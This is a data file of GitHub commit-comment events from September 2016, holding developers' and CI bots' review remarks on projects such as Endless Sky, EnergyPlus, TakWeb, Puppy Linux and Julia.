{"id":"4544886475","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975314,"position":110,"line":2254,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T23:10:08Z","updated_at":"2016-09-10T23:10:08Z","body":"No, I meant grammatically.\r\nI would say something like\r\n> The elevator opens up to a wide and vaulted hallway, lined on both sides by Wanderers dressed in black, who have come to pay their last respects to Rek."}},"created_at":"2016-09-10T23:10:08Z"}
{"id":"4544888422","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975316,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:11:28Z","updated_at":"2016-09-10T23:11:28Z","body":"That's gonna highlight in links. It's what i stumbled over. We need to take care of the word boundary, else things like testTreffnonXtest will highlight. Assuming this is not intended..."}},"created_at":"2016-09-10T23:11:28Z"}
{"id":"4544888569","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975317,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T23:11:36Z","updated_at":"2016-09-10T23:11:36Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T23:11:36Z"}
{"id":"4544889612","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975318,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T23:12:28Z","updated_at":"2016-09-10T23:12:28Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T23:12:28Z"}
{"id":"4544890642","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975320,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:13:14Z","updated_at":"2016-09-10T23:13:14Z","body":"@01micko: Does your 64-bit build still show up with squeeze https://github.com/puppylinux-woof-CE/woof-CE/issues/872 ? I noticed it is part of the template so maybe it doesn't get updated? :laughing: \r\n\r\nhttps://github.com/puppylinux-woof-CE/woof-CE/blob/rationalise/woof-code/DISTRO_SPECS"}},"created_at":"2016-09-10T23:13:14Z"}
{"id":"4544892051","type":"CommitCommentEvent","actor":{"login":"sindrenm"},"repo":{"name":"sindrenm/pokemon-go-tools-android"},"payload":{"comment":{"id":18975321,"position":null,"line":null,"path":null,"commit_id":"30bd4e3d7f99d53e0a909711ac18774fe0497cf9","created_at":"2016-09-10T23:14:19Z","updated_at":"2016-09-10T23:14:19Z","body":"Fixes #1."}},"created_at":"2016-09-10T23:14:19Z"}
{"id":"4544892191","type":"CommitCommentEvent","actor":{"login":"Nusja64"},"repo":{"name":"Nusja64/BelgradeEventsNewAndroidStudio"},"payload":{"comment":{"id":18975322,"position":null,"line":null,"path":null,"commit_id":"5f11373770c9b01c27845dce6cdb0fd04297cd89","created_at":"2016-09-10T23:14:26Z","updated_at":"2016-09-10T23:14:26Z","body":"poslednja verzija aplikacije, izvrsna ekstenzija"}},"created_at":"2016-09-10T23:14:26Z"}
{"id":"4544892492","type":"CommitCommentEvent","actor":{"login":"staticfloat"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18975323,"position":null,"line":null,"path":null,"commit_id":"59cb3b4fa1dc1b9679a50ca54214301b67d679b6","created_at":"2016-09-10T23:14:42Z","updated_at":"2016-09-10T23:14:42Z","body":"@tkelman Do you have any issues with this?  I'd like to cleanup our naming conventions for what the output of `make binary-dist` is.  As it stands, the Linux build gives us something like `julia-c7a48977b9-Linux-x86_64.tar.gz `, the Windows build gives us something like `julia-0.6.0-dev-x86_64.exe` (later renamed by the buildbots to contain a proper git shortcommit), and the OSX build gives us something like `Julia-0.6.0-dev-c7a48977b9.dmg`.\r\n\r\nWith this change we would generate linux-style filenames for everything, e.g. this commit generates:\r\n\r\nWindows: `julia-59cb3b4fa1-WINNT-x86_64.exe`\r\nLinux: `julia-59cb3b4fa1-Linux-x86_64.tar.gz`\r\nOSX: `julia-59cb3b4fa1-Darwin-x86_64.dmg`\r\n\r\nThe buildbot would currently map these files to the following filenames:\r\nWindows: `julia-0.6.0-59cb3b4fa1-win64.exe`\r\nLinux: `julia-0.6.0-59cb3b4fa1-linux64.tar.gz` (With `64` being replaced with more exotic architectures if necessary, such as `julia-0.6.0-59cb3b4fa1-linuxppc64le.tar.gz`)\r\nOSX: `julia-0.6.0-59cb3b4fa1-osx.dmg`\r\n\r\nIt bugs me a bit that `osx` doesn't have a `64` at the end of it."}},"created_at":"2016-09-10T23:14:42Z"}
{"id":"4544892891","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":18975325,"position":null,"line":null,"path":null,"commit_id":"2eee61505d13849bd1dd2aeea23e342d119dab2e","created_at":"2016-09-10T23:15:02Z","updated_at":"2016-09-10T23:15:02Z","body":"nano is life"}},"created_at":"2016-09-10T23:15:02Z"}
{"id":"4544893729","type":"CommitCommentEvent","actor":{"login":"timo"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18975328,"position":null,"line":null,"path":null,"commit_id":"bb6da769bd26fd5f831deb0edf886c7808ec974b","created_at":"2016-09-10T23:15:42Z","updated_at":"2016-09-10T23:15:42Z","body":"On 09/11/2016 12:52 AM, lizmat wrote:\n> Feels to me the number of permutations of the empty list is 0. And\n> hence it should just return an empty list.\n\nI think there's exactly one way to permute the elements in the empty\nlist, so a list with only the empty list in it makes sense to me.\n\nalso, i suppose the input ought to always be somewhere in the output.\n(1, 2, 3).permutations ought to have (1, 2, 3) somewhere in it, so why\nwouldn't ().permutations have () in it, too?\n\nthat's how i think of it\n"}},"created_at":"2016-09-10T23:15:42Z"}
{"id":"4544894661","type":"CommitCommentEvent","actor":{"login":"JerJohn15"},"repo":{"name":"JerJohn15/laverna"},"payload":{"comment":{"id":18975330,"position":null,"line":null,"path":null,"commit_id":"55e1d8d8c7725946989b8180a408c5b68efbcd08","created_at":"2016-09-10T23:16:40Z","updated_at":"2016-09-10T23:16:40Z","body":"- fixed grammar and punctuation \r\n- un-bolded parenthesis in steps"}},"created_at":"2016-09-10T23:16:40Z"}
{"id":"4544896293","type":"CommitCommentEvent","actor":{"login":"illori"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18975334,"position":null,"line":null,"path":null,"commit_id":"2f667a06ff4984a665fefc8cdcd9e4e02a385f36","created_at":"2016-09-10T23:18:16Z","updated_at":"2016-09-10T23:18:16Z","body":"Sure\n\nOn Sep 10, 2016 7:17 PM, \"Jon Stovell\" <notifications@github.com> wrote:\n\n> Thanks, @illori <https://github.com/illori>. Could you create a new issue\n> to remind me to fix this?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SimpleMachines/SMF2.1/commit/2f667a06ff4984a665fefc8cdcd9e4e02a385f36#commitcomment-18975313>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEOzfIRqbXAYnUKOja7br3pozCvlcovBks5qozi_gaJpZM4J50Hs>\n> .\n>\n"}},"created_at":"2016-09-10T23:18:16Z"}
{"id":"4544897455","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975335,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:19:24Z","updated_at":"2016-09-10T23:19:24Z","body":"Ah didn't see that"}},"created_at":"2016-09-10T23:19:24Z"}
{"id":"4544899188","type":"CommitCommentEvent","actor":{"login":"Lightn1ng"},"repo":{"name":"Lightn1ng/kernel_gts28vewifi"},"payload":{"comment":{"id":18975340,"position":null,"line":null,"path":null,"commit_id":"c97b96503e10235e5c5d86b4099aa97330a87235","created_at":"2016-09-10T23:21:09Z","updated_at":"2016-09-10T23:21:09Z","body":"They were already off!"}},"created_at":"2016-09-10T23:21:09Z"}
{"id":"4544899559","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975341,"position":null,"line":null,"path":null,"commit_id":"2cb26d1f1155c7bfaf7fe7825e2a59c7bb4c7dad","created_at":"2016-09-10T23:21:32Z","updated_at":"2016-09-10T23:21:32Z","body":"Check your maths :-) \r\n\r\nWhen you evaluate `popcount(b & ~(b >> 1))`, basically you calculate the number of  '10' sequences in the bit representation of b (adding imaginary zeros at the right of b, so that a b ending with '1' gets one imaginary '10' sequence at the end too).\r\n\r\nIf b is e->semiopenFiles[Us], you will be counting the holes in the pawn structure, but if b is e->semiopenFiles[Us]^0FF you will be counting the islands, which is what you want.\r\n\r\n"}},"created_at":"2016-09-10T23:21:32Z"}
{"id":"4544899661","type":"CommitCommentEvent","actor":{"login":"ovr"},"repo":{"name":"ovr/phpsa"},"payload":{"comment":{"id":18975342,"position":7,"line":634,"path":"src/Compiler/Expression.php","commit_id":"922200e72c1bdcf76d08cc5404eb69a73fcc07fa","created_at":"2016-09-10T23:21:39Z","updated_at":"2016-09-10T23:21:39Z","body":"@K-Phoen Related to `Variable` with `Variable` name"}},"created_at":"2016-09-10T23:21:39Z"}
{"id":"4544902245","type":"CommitCommentEvent","actor":{"login":"lacker"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18975344,"position":33,"line":47,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-10T23:24:01Z","updated_at":"2016-09-10T23:24:01Z","body":"A string of json inside json is not as good as using just json all the way down instead. Definitely it is not best practices to encode json inside json, just for APIs in general."}},"created_at":"2016-09-10T23:24:01Z"}
{"id":"4544902250","type":"CommitCommentEvent","actor":{"login":"toilethinges"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975345,"position":110,"line":2254,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T23:24:01Z","updated_at":"2016-09-10T23:24:01Z","body":"In my opinion, it's grammatically flawless. That use of \"either\" was confusing to me a while back, but I've gotten over it. The:\r\n\r\n> dressed in black, come to pay their last respects\r\n\r\npart works normally, too. Your change, \"_who have_ come,\" is kind of implied."}},"created_at":"2016-09-10T23:24:01Z"}
{"id":"4544902573","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975346,"position":null,"line":null,"path":null,"commit_id":"2cb26d1f1155c7bfaf7fe7825e2a59c7bb4c7dad","created_at":"2016-09-10T23:24:19Z","updated_at":"2016-09-10T23:24:19Z","body":"@snicolet I was just forgetting that it is `semiopenFiles[Us]`, and not `~semiopenFiles[Us]`... Sorry!"}},"created_at":"2016-09-10T23:24:19Z"}
{"id":"4544903715","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975347,"position":128,"line":769,"path":"data/wanderers.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T23:25:23Z","updated_at":"2016-09-10T23:25:23Z","body":"> and begun to built a military base\r\n\r\nand have begun to build a military base*"}},"created_at":"2016-09-10T23:25:23Z"}
{"id":"4544904495","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975350,"position":4,"line":4,"path":"src/duplicated.jl","commit_id":"2bac2111ed304ff32b246384ba8653d9d7415193","created_at":"2016-09-10T23:26:11Z","updated_at":"2016-09-10T23:26:11Z","body":"You are right, I just copied it from R."}},"created_at":"2016-09-10T23:26:11Z"}
{"id":"4544905703","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975352,"position":12,"line":12,"path":"src/duplicated.jl","commit_id":"2bac2111ed304ff32b246384ba8653d9d7415193","created_at":"2016-09-10T23:27:24Z","updated_at":"2016-09-10T23:27:24Z","body":"OK, I see.\r\n"}},"created_at":"2016-09-10T23:27:24Z"}
{"id":"4544907193","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18975356,"position":null,"line":null,"path":null,"commit_id":"f21785791c559a64500da0aa8863a86b18e357df","created_at":"2016-09-10T23:28:51Z","updated_at":"2016-09-10T23:28:51Z","body":"@sharkwinter \r\n```\r\n./scripts/feeds update packages\r\n./scripts/feeds install -a -p packages\r\nmake menuconfig\r\n```"}},"created_at":"2016-09-10T23:28:51Z"}
{"id":"4544907307","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975357,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:28:56Z","updated_at":"2016-09-10T23:28:56Z","body":"And Guest accounts just count numbers. So Guest77 must not highlight for Guest7."}},"created_at":"2016-09-10T23:28:56Z"}
{"id":"4544908875","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975359,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:30:20Z","updated_at":"2016-09-10T23:30:20Z","body":"Oh man.. let me know when you solve it, I'll just take ur code ;)"}},"created_at":"2016-09-10T23:30:20Z"}
{"id":"4544909854","type":"CommitCommentEvent","actor":{"login":"jezznar"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18975360,"position":null,"line":null,"path":null,"commit_id":"380f5d6f8704261c45fe224738164f59587cef37","created_at":"2016-09-10T23:31:10Z","updated_at":"2016-09-10T23:31:10Z","body":"Nazi alert."}},"created_at":"2016-09-10T23:31:10Z"}
{"id":"4544909982","type":"CommitCommentEvent","actor":{"login":"warp-core"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975361,"position":5,"line":771,"path":"data/wanderers.txt","commit_id":"0de5d40f6be0298ab5a6828d5e7b507b60543e93","created_at":"2016-09-10T23:31:16Z","updated_at":"2016-09-10T23:31:16Z","body":"It should also be 'build', not 'build'."}},"created_at":"2016-09-10T23:31:16Z"}
{"id":"4544914003","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975363,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:35:12Z","updated_at":"2016-09-10T23:35:12Z","body":"`  message = message.replace(new RegExp('(^|[^\\\\w\\\\d])(' + server.myname + ')(?=$|[^\\\\w\\\\d])', 'gi'),`\r\n`      '$1<span class=\"chatmyname\">$2</span>');`\r\n`chatMessage.append(message + '<br>');`\r\n\r\nThis worked in the end. The highlighting only activates, if the name is not lead by either a letter, number or underscore. That should do it. (replace 'message' with 'txt')"}},"created_at":"2016-09-10T23:35:12Z"}
{"id":"4544914210","type":"CommitCommentEvent","actor":{"login":"bluefeature"},"repo":{"name":"bluefeature/repoOne"},"payload":{"comment":{"id":18975364,"position":null,"line":null,"path":null,"commit_id":"417b518afb05e9d92ff12aa25a7094a88eb5e375","created_at":"2016-09-10T23:35:22Z","updated_at":"2016-09-10T23:35:22Z","body":"happy new year"}},"created_at":"2016-09-10T23:35:22Z"}
{"id":"4544914747","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975367,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:35:55Z","updated_at":"2016-09-10T23:35:55Z","body":"Thanks!!"}},"created_at":"2016-09-10T23:35:55Z"}
{"id":"4544915023","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975368,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:36:11Z","updated_at":"2016-09-10T23:36:11Z","body":"read last edit\r\n"}},"created_at":"2016-09-10T23:36:11Z"}
{"id":"4544917055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975371,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T23:38:05Z","updated_at":"2016-09-10T23:38:05Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-10T23:38:05Z"}
{"id":"4544918306","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975374,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:39:19Z","updated_at":"2016-09-10T23:39:19Z","body":"name.com is broken"}},"created_at":"2016-09-10T23:39:19Z"}
{"id":"4544918947","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975375,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:39:59Z","updated_at":"2016-09-10T23:39:59Z","body":"@ninaholic yes.\r\n\r\nBut I have bigger problems. My latest build doesn't boot at all, not cd, not frugal. I haven't had this happen since very early 64 bit dev... (over 2 years ago) so something is definitely wonky in init.\r\n\r\nIn a frugal, the main sfs isn't found at all (booting pfix=atahd).\r\n\r\nIn the cd (real cd boot) it is found and starts copying to ram then I am booted out with:\r\n`mount: mounting /dev/loop0 on /pup_r02 failed: invalid argument`\r\n\r\nSo even if the frugal main sfs _was_ found I would have got booted anyway.\r\n\r\nOh well. That's it for me for a couple of weeks as I am on holiday from Wednesday and am out of time now."}},"created_at":"2016-09-10T23:39:59Z"}
{"id":"4544919117","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18975376,"position":2,"line":33,"path":"api/src/main/resources/org/openmrs/api/db/hibernate/Cohort.hbm.xml","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-10T23:40:09Z","updated_at":"2016-09-10T23:40:09Z","body":"Something in lines of given below:\r\n\r\n```\r\n<set name=\"memberIds\" cascade=\"none\" lazy=\"true\" table=\"cohort_member\">\r\n\t<key column=\"cohort_id\" not-null=\"true\"/>\r\n\t<element column=\"patient_id\" type=\"integer\" not-null=\"true\"/>\r\n</set>\r\n\r\n<set name=\"members\" cascade=\"none\" lazy=\"true\" table=\"cohort_member\">\r\n\t<key column=\"cohort_member_id\" not-null=\"true\"/>\r\n\t<one-to-many class=\"CohortMember\"/>\r\n</set>\r\n```\r\nWhile retaining the previous relationship stated by memberIds?"}},"created_at":"2016-09-10T23:40:09Z"}
{"id":"4544919684","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975377,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:40:35Z","updated_at":"2016-09-10T23:40:35Z","body":"due to linkify. Yeah treffnonx.github.io also breaks for me. It is inside tags though. I am not sure it can be prvented. Linkify should apply after, but then the link will not work."}},"created_at":"2016-09-10T23:40:35Z"}
{"id":"4544921292","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975379,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:42:01Z","updated_at":"2016-09-10T23:42:01Z","body":"All I have in the /tmp/bootinit.log is a `cp: read error: I/O error`, so maybe a bad burn.\r\n\r\nI'll try qemu."}},"created_at":"2016-09-10T23:42:01Z"}
{"id":"4544921462","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18975380,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-10T23:42:11Z","updated_at":"2016-09-10T23:42:11Z","body":"Might be better to contain this in a NEW_ION flag, or something. Changing the default upstream behavior should be avoided, since the default is targeted at 3.4 kernels.  \r\n\r\nI was trying to build CM13 for ancora, but too many changes everywhere, so I gave up. :p "}},"created_at":"2016-09-10T23:42:11Z"}
{"id":"4544921632","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975381,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:42:21Z","updated_at":"2016-09-10T23:42:21Z","body":"I'll leave the fork like this for the night as it is a smaller problem, but i will see to it tomorrow. It is after all pretty messy on break..."}},"created_at":"2016-09-10T23:42:21Z"}
{"id":"4544923202","type":"CommitCommentEvent","actor":{"login":"rfabbri"},"repo":{"name":"vxl/vxl"},"payload":{"comment":{"id":18975384,"position":null,"line":null,"path":null,"commit_id":"1a13f46eff999680ddd6cad0f0b4a81dc336cacc","created_at":"2016-09-10T23:43:48Z","updated_at":"2016-09-10T23:43:48Z","body":"Perhaps this introduced an unwanted change in https://github.com/vxl/vxl/blob/master/core/doc/book/appendix_build.texi\r\nThe file is outdated but it may be a good idea to undo this. Thanks"}},"created_at":"2016-09-10T23:43:48Z"}
{"id":"4544923271","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975385,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:43:52Z","updated_at":"2016-09-10T23:43:52Z","body":"I used your code with minor change.. 6d079108f6a24e0a832c4fd37bb93fa354119109 .. seems to work ok.."}},"created_at":"2016-09-10T23:43:52Z"}
{"id":"4544923802","type":"CommitCommentEvent","actor":{"login":"Camouflage100"},"repo":{"name":"Camouflage100/Factions"},"payload":{"comment":{"id":18975387,"position":null,"line":null,"path":null,"commit_id":"0eb51da7077153cb97630201bd5218e0b29381b3","created_at":"2016-09-10T23:44:24Z","updated_at":"2016-09-10T23:44:24Z","body":"Also in this commit I modified the Faction and MPlayer entities to add a addPowerBoost method to make adding and removing powerboosts easier for developers"}},"created_at":"2016-09-10T23:44:24Z"}
{"id":"4544926790","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975389,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-10T23:47:18Z","updated_at":"2016-09-10T23:47:18Z","body":"Wat do you mean?"}},"created_at":"2016-09-10T23:47:18Z"}
{"id":"4544928046","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975390,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:48:27Z","updated_at":"2016-09-10T23:48:27Z","body":"Ok, boot works in qemu from ISO (uefi), so was a bad burn, but still, frugals on 2 separate boxes fail, only 1 hard drive in each box, both 32 and 64, so I'm stuck there for a bit.\r\n\r\n![qemu-sl64-6 9 6 1](https://cloud.githubusercontent.com/assets/1019119/18414249/b5d61bd0-7804-11e6-8632-71eedd51d745.jpg)\r\n"}},"created_at":"2016-09-10T23:48:27Z"}
{"id":"4544929372","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975395,"position":20,"line":20,"path":"src/rep.jl","commit_id":"544938fa9ecb172852d20dc2a67945e23c6618bc","created_at":"2016-09-10T23:49:49Z","updated_at":"2016-09-10T23:49:49Z","body":"In R, the second argument is `times`, I suggest to keep this tradition.\r\nI often use `rep(1:4, 3)` which is very convenient. What do you think?\r\n"}},"created_at":"2016-09-10T23:49:49Z"}
{"id":"4544929544","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975396,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:50:01Z","updated_at":"2016-09-10T23:50:01Z","body":"it will add a space.\r\nIf you type ----kakaburra--- you will get --- -kakaburra---\r\nalso -kakaburra.com should actually still highlight."}},"created_at":"2016-09-10T23:50:01Z"}
{"id":"4544930170","type":"CommitCommentEvent","actor":{"login":"dougeth"},"repo":{"name":"Orthodyne-mve/osTicket-1.8"},"payload":{"comment":{"id":18975397,"position":null,"line":null,"path":null,"commit_id":"8df821de2aaeeeb51c9f1f2ec19770b71e82620f","created_at":"2016-09-10T23:50:31Z","updated_at":"2016-09-10T23:50:31Z","body":"@Orthodyne-mve -  Thank you a million times over for this fix. Why is it that osTicket has not included this fix in the latest release is a mystery to me.  "}},"created_at":"2016-09-10T23:50:31Z"}
{"id":"4544930189","type":"CommitCommentEvent","actor":{"login":"miclovich"},"repo":{"name":"miclovich/rr-redux"},"payload":{"comment":{"id":18975398,"position":7,"line":28,"path":"package.json","commit_id":"a7705cfe3a96c296af2e37341fd0e7637905c008","created_at":"2016-09-10T23:50:32Z","updated_at":"2016-09-10T23:50:32Z","body":"@chieakiba you originally had `chokidar` placed without any \"arguments\".. this tool is meant to look for changes already. Secondly, there is no `--watch` flag on this command. That's for webpack for us. Line 29 has a more refined way of dealing with CSS.\r\n\r\nAlso, look into the use of `lessc` compiler: http://lesscss.org/"}},"created_at":"2016-09-10T23:50:32Z"}
{"id":"4544930830","type":"CommitCommentEvent","actor":{"login":"chaitu236"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975400,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:51:07Z","updated_at":"2016-09-10T23:51:07Z","body":":/"}},"created_at":"2016-09-10T23:51:07Z"}
{"id":"4544931640","type":"CommitCommentEvent","actor":{"login":"DreamSeason"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18975401,"position":null,"line":null,"path":null,"commit_id":"bdcacb297092a3259cb2e2b5785cd215c78c3088","created_at":"2016-09-10T23:51:52Z","updated_at":"2016-09-10T23:51:52Z","body":"What is feeds used for? Btw, ss redir kept flooding my console log with the latest release. Anyway to configure that?"}},"created_at":"2016-09-10T23:51:52Z"}
